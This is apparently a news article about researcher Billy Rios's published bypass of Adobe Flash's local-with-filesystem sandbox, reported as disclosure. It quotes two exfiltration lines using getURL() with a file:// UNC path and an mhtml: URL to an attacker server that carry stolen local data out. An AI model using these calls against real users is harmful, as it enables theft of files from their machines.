A security researcher has published a simple method for bypassing one of the sandboxes that Adobe has implemented to prevent Flash files from taking unwanted or malicious actions on users’ PCs.
Billy Rios, a well-known application security researcher, developed a quick method for bypassing the local-with-filesystem sandbox that Adobe uses to protect local Flash files and prevent malicious Flash files created by attackers from stealing data or taking other actions without the user’s knowledge. Rios’s method, which he published Monday in a blog post, entails using a specific protocol handler to access a local file and pass the contents to a server controlled by the attacker.
The documentation from Adobe that explains the way the Flash sandboxes operate specifies that with the local-with-filesystem sandbox “SWF files can read local
files (by using the URLLoader class, for example), but they cannot
communicate with the network in any way. This assures the user that
local data cannot be leaked out to the network or otherwise inappropriately
shared.”
Rios’s method gets around the restrictions on Flash files’ network communications with an elegantly simple technique.
“The simplest way to bypass the local-with-filesystem sandbox is to
simply use a file:// request to a remote server. For example, after
loading the content from the local file system an attacker can simply
pass the contents to the attacker server via getURL() and a url like:
file://\192.168.1.1stolen-data-here,” he said. “In the case of the local-with-filesystem sandbox, Adobe has decided
to prevent network access through the use of protocol handler
blacklists. If we can find a protocol handler that hasn’t been
blacklisted by Adobe and allows for network communication, we win.
“There are a large number of protocol handlers that meet the criteria
outlined in the previous sentence, but we’ll use the mhtml protocol
handler as an example,” Rios wrote. “The mhtml protocol handler is available on
modern Windows systems, can be used without any prompts, and is not
blacklisted by Flash. Using the mhtml protocol handler, it’s easy to
bypass the Flash sandbox: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);”
Sandboxes have become a popular tool for software vendors who are looking for ways to prevent attackers from using their applications as launching pads for attacks elsewhere on a compromised machine. Adobe recently released a new version of Reader that includes a sandbox, called Protected Mode, and also has worked with Google to implement a sandboxed version of Flash in the Chrome browser.
